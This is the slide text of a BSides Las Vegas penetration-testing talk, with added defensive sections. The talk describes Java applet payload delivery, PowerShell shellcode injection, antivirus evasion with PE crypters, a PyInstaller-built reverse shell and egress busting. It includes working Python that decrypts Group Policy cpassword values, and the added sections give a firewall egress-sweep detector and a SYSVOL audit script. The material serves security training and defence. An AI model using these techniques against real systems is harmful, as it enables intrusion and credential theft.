BSIDES Las Vegas Secret Pentesting Techniques Shhh... Dave Kennedy Founder, Principal Security Consultant Email:
[email protected] https://www.trustedsec.com @TrustedSec
Introduction • As penetration testers, exploit writers, huggers, etc. we have secret techniques we always use. • Although some may or may not be public, they are generally obscure and not well known.
• The purpose of today’s talk is to show you my secrets: some of the techniques I use that aren’t widely known. • Why show you? I’m an open book on everything I do and sharing is what it’s all about.
Technique #1 • Java Applet Attack (SET) – Well known attack method right? • Do you know how it actually works? • Do you know the techniques behind it to make it successful?
ZOMG APT • News agencies around the world discovered a new and extremely advanced zero-day exploit against Java. • Made me feel kind of special =) • How did people find out it was SET?
ILIKEHUGS
DEMO: Walking through the Attack
Explaining the Applet • Parameters that are injected into the HTML code are pulled from the Applet. • Obfuscated and randomized each time. • Parameters tell the Applet which attacks to use.
Method 1 – Binary Dropper • Binary is downloaded from the attacker machine via web server (Java downloader). • Binary is obfuscated each time per deployment: a combination of PE manipulation, UPX, and rewriting the binary on the fly (import pefile).
DEMO: Binary Dropping Technique
Method 1 – Weak Sauce • Binaries are easily picked up by AV if signatures focus on the obfuscation techniques (SET changes them each version). • Direct interaction with the Windows file system and writing to disk. • Multiple points of evidence on the victim machine.
Method 2 – Shellcodeexec • Shellcodeexec method drops a custom compiled and modified version of shellcodeexec by Bernardo Damele. • Executable takes int main(int argc, char*argv[]) parameter for alphanumeric shellcode. Uses VirtualAlloc for read, write, and execute memory space. • Alphanumeric shellcode is executed in memory and payload is delivered.
DEMO: ShellcodeExec
Method 2 – Easily detectable • Shellcodeexec is a simple yet awesome method but still has a number of drawbacks. • Like Method 1, binaries can be picked up unless a custom version is created. Direct interaction with the Windows file system and writing to disk. • Like Method 1, multiple points of evidence on the victim machine.
Method 3 – Powershell Injection • Detect if Powershell is installed (installed by default on Vista and Windows 7 and 8). • Powershell gives us complete flexibility in a number of post exploitation situations. • Technique discovered by Matthew Graeber (you rock).
Method 3 – PS ShellCode Injection • Applet detects if Powershell is installed on the system. • Grabs the operating system type (x86 / x64). • Deploys shellcode straight through Powershell.
DEMO: ShellcodeExec
Method 3 – Powershell Injection • Never touches disk – AV / HIPS signatures go out the door. • Obfuscated each time so that memory inspection is extremely difficult. • Extremely reliable and stable.
PE Security Evasion
Scenario 1 – Dropping PE’s like it’s hot • You’re using Metasploit – all of the binaries are being picked up by AV, HIPS, etc. • In most cases, I will rewrite the exe template for Metasploit to customize the binary for evasion. • A couple of cool ways to do this.
Modifying PE For Evasion in MSF • Easiest way for me is to make a simple program that creates a RWX process then have the program execute Metasploit Shellcode. • You can also modify the Metasploit exe.rb template and obfuscate the code that way.
PE Crypters • One of my favorites was recently released called Hyperion (Christian Ammann from nullsecurity.net). • Encrypts the PE file using a randomized simple cipher key with AES 128. • When the executable is run, it brute forces the AES key then decrypts the PE file for you.
DEMO: Hyperion
Hyperion Encryption • Very cool concept and easy to use and write one for yourself. • Ability to have a completely unique PE file each time. • Slight downfall: the stub used for brute force is not polymorphic.
Building a Simple Reverse Shell
The Reverse Shell • Connects out to the attacker (reverse shell).
Compiling Binaries • PyInstaller – Compiles python code for you into a binary by wrapping the Python Interpreter into the executable. • Works on Linux, OSX, and Windows.
    python Configure.py
    python Makespec.py --onefile --noconsole shell.py
    python Build.py shell/shell.spec
    cd shell\dist
Making it easy – pybuild.py • All code and samples will be released on the TrustedSec website soon.
DEMO: Building a Shell
Bypassing AV
Finding your way home
Bumping the Firewall • A number of companies restrict ports outbound and only allow what’s needed for the business. • Trouble getting payloads out, especially if you only have one shot.
Egress Busting • Few ways to do it: a pre-staged payload for identifying the way out. • Attempt staged reverse on every port. • Metasploit has an ALLPORTS payload as well.
Egress Buster 0.2 • Server/Client situation where the victim connects out on every port, 1024 ports at a time. • Server listens for the connection and reports back. • Here’s where you can have some fun.
Egress Buster Reverse Shell
Egress Buster Reverse Shell • Released this week! • Allows you to bust all ports inside the firewall and spawn a command shell. • Custom, so no AV picks this up. Byte compiled into an executable.
DEMO: Egress Buster Reverse Shell
Egress Buster Reverse Shell Usage • Recent Penetration Test – Found file upload + execute binaries. • Could not find a standard port out, i.e. 80, 443, 53, 25, etc. • Wrote this to deploy and found several obscure ports that were allowed.
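The Egress Buster behaviour above (one host connecting out on every port, 1024 at a time) leaves a distinctive trace on a perimeter firewall. This is an added example, not code from the talk or from TrustedSec’s tools: it flags a source host that hits many distinct destination ports on one destination within a short window, run over constructed sample log lines (the log format, hosts and thresholds are assumptions).

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed syslog-style firewall lines (not from any real device), one per line:
# "<iso time> DENY|ALLOW TCP src=<ip>:<port> dst=<ip>:<port>"
LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?:DENY|ALLOW) TCP src=(?P<src>[\d.]+):\d+ "
    r"dst=(?P<dst>[\d.]+):(?P<dport>\d+)$")

def parse(line):
    """Return (timestamp, src_ip, dst_ip, dst_port), or None for a non-matching line."""
    m = LINE_RE.match(line)
    return (datetime.fromisoformat(m["ts"]), m["src"], m["dst"], int(m["dport"])) if m else None

def egress_sweeps(lines, window=timedelta(seconds=60), min_ports=50):
    """Map (src, dst) -> max number of distinct destination ports seen inside any
    sliding window of length `window`, for pairs reaching at least min_ports."""
    by_pair = defaultdict(list)
    for line in lines:
        rec = parse(line)
        if rec:
            ts, src, dst, dport = rec
            by_pair[(src, dst)].append((ts, dport))
    alerts = {}
    for pair, events in by_pair.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            while events[end][0] - events[start][0] > window:
                start += 1  # slide the window start forward
            distinct = len({p for _, p in events[start:end + 1]})
            if distinct >= min_ports:
                alerts[pair] = max(alerts.get(pair, 0), distinct)
    return alerts

def build_sample_log():
    """Constructed traffic: one host walks ports 1..80 of a single external IP in
    20 seconds (the buster's pattern) while another host just browses the web."""
    base = datetime(2013, 7, 31, 10, 0, 0)
    lines = []
    for p in range(1, 81):
        t = base + timedelta(milliseconds=250 * p)
        lines.append(f"{t.isoformat()} DENY TCP src=10.1.5.23:{49000 + p} dst=198.51.100.7:{p}")
    for i, p in enumerate((80, 443, 443, 80)):
        t = base + timedelta(seconds=30 * i)
        lines.append(f"{t.isoformat()} ALLOW TCP src=10.1.5.40:{52000 + i} dst=203.0.113.9:{p}")
    return lines
```

Feeding `build_sample_log()` to `egress_sweeps()` reports only the busting host; the browsing host never exceeds the distinct-port threshold.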
Fun with Group Policy
One of my PERSONAL Favorites • How many times have we been on a pentest with just a domain user? • Need that local administrator account for all of the domain computers? Research from: Sogeti ESEC Pentest. Article: http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences
The Attack • Navigate to a domain controller and hit up the SYSVOL share. • Head to the domain name and Policies folder. • Look for a GUID then MACHINE\Preferences\Groups. • Look for the Groups.xml file.
Contents of File
Static Key for AES Anyone?
Python Code
    # code was developed and created from
    # http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences
    # (Python 2 with PyCrypto, as used in the talk)
    from Crypto.Cipher import AES
    from base64 import b64decode

    # static AES-128 key Microsoft published for GPP cpassword values
    key = """
    4e 99 06 e8 fc b6 6c c9 fa f4 93 10 62 0f fe e8
    f4 96 e8 06 cc 05 79 90 20 9b 09 a4 33 b6 6c 1b
    """.replace(" ", "").replace("\n", "").decode('hex')

    # cpassword attribute copied out of Groups.xml
    cpassword = b64decode("j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw=")

    # mode 2 is AES.MODE_CBC; PyCrypto uses an all-zero IV when none is given
    o = AES.new(key, AES.MODE_CBC).decrypt(cpassword)

    # strip the PKCS#7 padding (last byte is the pad length); plaintext is UTF-16
    print o[:-ord(o[-1])].decode('utf16')
Decrypted Password
>>> print o[:-ord(o[-1])].decode('utf16') Local*P4ssword!
Expanding on Groups.xml
More Passwords Stored • The folks over at rewt dance (http://rewtdance.blogspot.com/2012/06/exploiting-windows-2008-group-policy.html) found a few more areas that store passwords using the cpassword attribute. • Services, ScheduledTasks, SQL servers and much more are impacted.
List of Other Affected Areas (from rewt dance)
    Services\Services.xml: http://msdn.microsoft.com/en-us/library/cc980070(v=prot.13)
    ScheduledTasks\ScheduledTasks.xml: http://msdn.microsoft.com/en-us/library/cc422920(v=prot.13), http://msdn.microsoft.com/en-us/library/dd341350(v=prot.13), http://msdn.microsoft.com/en-us/library/dd304114(v=prot.13)
    Printers\Printers.xml: http://msdn.microsoft.com/en-us/library/cc422918(v=prot.13)
    Drives\Drives.xml: http://msdn.microsoft.com/en-us/library/cc704598(v=prot.13)
    DataSources\DataSources.xml: http://msdn.microsoft.com/en-us/library/cc422926(v=prot.13)
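The decryption on the Python Code slide and the list of other Preferences files that carry cpassword attributes together suggest a small audit script for the SYSVOL share: walk one of these XML files, report every cpassword, and, when a crypto library is available, decrypt it with the same static key to confirm what is exposed. This is an added example, not the talk’s or Sogeti’s code; the sample Groups.xml is constructed, and the per-file account attribute names are an assumption taken from the Preferences schemas rather than from the slides.

```python
import base64
import xml.etree.ElementTree as ET

try:
    from Crypto.Cipher import AES  # PyCrypto / PyCryptodome; decryption is skipped if absent
except ImportError:
    AES = None

# Static AES-128 key from Microsoft's documentation (same bytes as the talk's slide)
GPP_KEY = bytes.fromhex(
    "4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b")

# Attribute that names the account next to cpassword in Groups, Drives, Services,
# ScheduledTasks and DataSources files (assumed from the XML schemas, not from the talk)
ACCOUNT_ATTRS = ("userName", "username", "accountName", "runAs", "name")

# Constructed Groups.xml fragment in the GPP schema (not captured from a real domain)
SAMPLE_GROUPS_XML = """<Groups>
  <User name="localadmin">
    <Properties action="U" newName="" fullName="" description=""
      cpassword="j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw="
      changeLogon="0" noChange="1" neverExpires="1" userName="localadmin"/>
  </User>
</Groups>"""

def find_cpasswords(xml_text):
    """Return (account, cpassword) for every element carrying a cpassword attribute."""
    hits = []
    for elem in ET.fromstring(xml_text).iter():
        cp = elem.get("cpassword")
        if cp:
            who = next((elem.get(a) for a in ACCOUNT_ATTRS if elem.get(a)), elem.tag)
            hits.append((who, cp))
    return hits

def fix_padding(b64):
    """GPP writes some values without base64 '=' padding; restore it before decoding."""
    return b64 + "=" * (-len(b64) % 4)

def decrypt_cpassword(cpassword):
    """AES-128-CBC with an all-zero IV, PKCS#7 padding, UTF-16LE plaintext."""
    data = base64.b64decode(fix_padding(cpassword))
    plain = AES.new(GPP_KEY, AES.MODE_CBC, b"\x00" * 16).decrypt(data)
    return plain[:-plain[-1]].decode("utf-16-le")

if __name__ == "__main__":
    for who, cp in find_cpasswords(SAMPLE_GROUPS_XML):
        print(who, decrypt_cpassword(cp) if AES else "(cpassword present; no AES library)")
```

Running it over every Preferences XML file under a policy GUID lists each account whose password is recoverable, which is the inventory a defender needs before removing those entries.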
There’s a ton more of these… Hopefully can make these a series.
Downloads
For the code and tools used in this presentation, head over to https://www.trustedsec.com and click on the Downloads.